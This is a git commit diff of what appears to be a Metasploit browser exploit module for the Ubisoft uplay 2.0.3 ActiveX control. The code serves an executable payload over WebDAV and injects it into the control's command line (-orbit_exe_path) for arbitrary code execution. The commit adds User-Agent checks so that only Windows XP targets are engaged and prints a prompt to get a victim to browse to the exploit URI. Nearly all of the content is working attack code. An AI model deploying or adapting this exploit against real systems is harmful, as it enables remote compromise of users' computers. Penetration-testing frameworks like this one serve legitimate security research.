Lots of changes before commit.

unstable
sinn3r 2012-08-06 11:54:08 -05:00
parent 25b2b2de68
commit 69ff9e7c1c
1 changed files with 30 additions and 31 deletions

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -17,26 +13,15 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking
#:classid => "{1c492e6a-2803-5ed7-83e1-1b1d4d41eb39}" # Does not get registered in IE properly?
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Ubisoft uplay Active X Control Arbitrary Code Execution',
'Name' => 'Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution',
'Description' => %q{
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be running.
The exploit will request an exe payload over WebDAV, and must be running on port 80.
Tested in Win XP, does not appear to work in Win7.
Ubisoft released patch 2.04 as of Mon 20th July.
The uplay ActiveX component allows an attacker to execute any command line action.
User must sign in, unless auto-sign in is enabled and uplay must not already be
running. Due to the way the malicious executable is served (WebDAV), the module
must be run on port 80, so please make sure you have enough privilege to do that.
Ubisoft released patch 2.04 as of Mon 20th July.
},
'License' => MSF_LICENSE,
'Author' =>
@ -46,15 +31,15 @@ class Metasploit3 < Msf::Exploit::Remote
'phillips321 <phillips321[at]phillips321.co.uk>',
'Richard Hicks <scriptmonkeyblog[at]gmail.com>'
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', 'http://osvdb.org/show/osvdb/84402'],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Jul/375']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Automatic', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 29 2012'))
@ -66,11 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('EXPLOITPATH', [false, "The URI to use for the exploit"])
], self.class)
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH') # WebDAV does not support SSL and must run over port 80.
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
# WebDAV does not support SSL and must run over port 80.
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT' 'URIPATH')
end
def autofilter
@ -81,6 +63,11 @@ class Metasploit3 < Msf::Exploit::Remote
use_zlib
end
def is_exploitable?(req)
# Only engage Win XP SP3 targets
req.headers['User-Agent'] =~ /NT 5\.1/
end
def on_request_uri(cli, request)
case request.method
when 'OPTIONS'
@ -89,7 +76,15 @@ class Metasploit3 < Msf::Exploit::Remote
process_propfind(cli, request)
when 'GET'
if request.uri_parts['Resource'].include? @uplay_uri
prompt_uplay(cli, request)
if is_exploitable?(request)
prompt_uplay(cli, request)
else
print_error("Not the target we want, will not engage.")
resp = create_response(404, "Not Found")
resp.body = ""
resp['Content-Type'] = 'text/html'
cli.send_response(resp)
end
else
process_get(cli, request)
end
@ -172,7 +167,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
end
#
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request)
@ -409,6 +404,10 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end
def exploit
@basename = rand_text_alpha(8)
@share_name = rand_text_alpha(8)
@extensions = "exe"
if datastore['EXPLOITPATH']
@uplay_uri = datastore['EXPLOITPATH']
else
@ -424,7 +423,7 @@ x.open('-orbit_product_id 1 -orbit_exe_path #{cmd} -uplay_steam_mode -uplay_dev_
end
vprint_status("Payload available at #{@exploit_unc}#{@share_name}\\#{@basename}.exe")
print_status("Exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
print_good("Please let your victim browse to this exploit URI: http://#{myhost}:#{datastore['SRVPORT']}/#{@uplay_uri}")
super
end